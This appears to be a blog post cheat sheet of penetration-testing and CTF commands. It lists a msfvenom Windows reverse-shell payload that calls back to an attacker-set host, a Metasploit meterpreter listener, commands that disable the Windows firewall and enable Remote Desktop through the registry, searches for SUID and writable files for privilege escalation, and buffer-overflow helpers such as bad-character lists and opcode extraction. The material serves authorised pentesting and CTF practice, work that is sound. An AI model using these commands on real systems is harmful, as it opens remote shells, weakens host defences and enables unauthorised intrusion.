It Useful commands (Linux, Windows, CTF, Exploit, etc...)

Useful commands (Linux, Windows, CTF, Exploit, etc...)


Search commands

Look for an text inside of file data

[sourcecode language="shell"]find / -type f -exec grep -Hn 'content_to_be_found' {} \;

Looking for writable files

[sourcecode language="shell"]find / -perm -2 ! -type l ! -path "/proc*" ! -path "/sys*" -ls 2>/dev/null


Buffer Overflow

Looking for and possible vulnerable code

[sourcecode language="shell"]find . -type f -exec grep -Hn 'strcpy' {} \;
find . -type f -exec grep -Hn 'strcpy' {} \; | awk -F'[:(,)]' '{print $1 ":" $2 " ==> " $4 "|" $5 "|" $6}'

Bad Characters

[sourcecode language="shell"]badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"

Generating Payload

Generating an payload to be used at python script avoiding some bad characters

[sourcecode language="shell"]msfvenom -p windows/shell_reverse_tcp LHOST=<server_ip> LPORT=<server_port> -b '\x00\x0a\x0d' -f python

Decoding/printting an HEX Code

[sourcecode language="shell"]echo "41424344" | xxd -r -p
cat hexfile.txt | sed 's/0x//g' | sed 's/,//g' | tr -d '\n' | xxd -r -p

Listting all msfvenom payloads candidates and his Size

[sourcecode language="shell"]for p in `msfvenom --list payloads | grep windows | awk '{print $1}'` ; do echo $p; msfvenom -p $p --list-options 2>&1 | grep -i "total size"; echo; done

Generating 100 files with random content betwwen 1 and 10 MB

[sourcecode language="shell"]
for i in {1..100} ; do SIZE=$(( ( RANDOM % 10 ) + 1 )); FILENAME=$(cat /dev/urandom | tr -cd 'a-f0-9' | head -c 32); echo "[$i - 100] Generating $SIZE file..."; dd if=/dev/urandom of=sample_$FILENAME.txt bs=1M count=$SIZE; done

Getting only binary opcode

[sourcecode language="shell"]objdump -d mcat |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' | sed 's/ /\\x/g'



Disabling Windows firewall

[sourcecode language="shell"]netsh firewall opmode disable
netsh advfirewall set allprofiles state off

Enabling Remote Desktop Service

[sourcecode language="shell"]reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0



Rdesktop with disk sharing

[sourcecode language="shell"]rdesktop -u user -p password server:port -r disk:test=/tmp/ -g 85% -x m

Starting Metasploit Listener

[sourcecode language="shell"]use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set ExitOnSession false
exploit -j -z

Finding all root SUID files

[sourcecode language="shell"]find / -perm +4000 -uid 0 2>/dev/null

Filtering wordlist by length and unique texts

[sourcecode language="shell"]cat data.txt | awk '{if (length($0) > 6 && length($0) <= 16) print tolower($0) }' | sort -u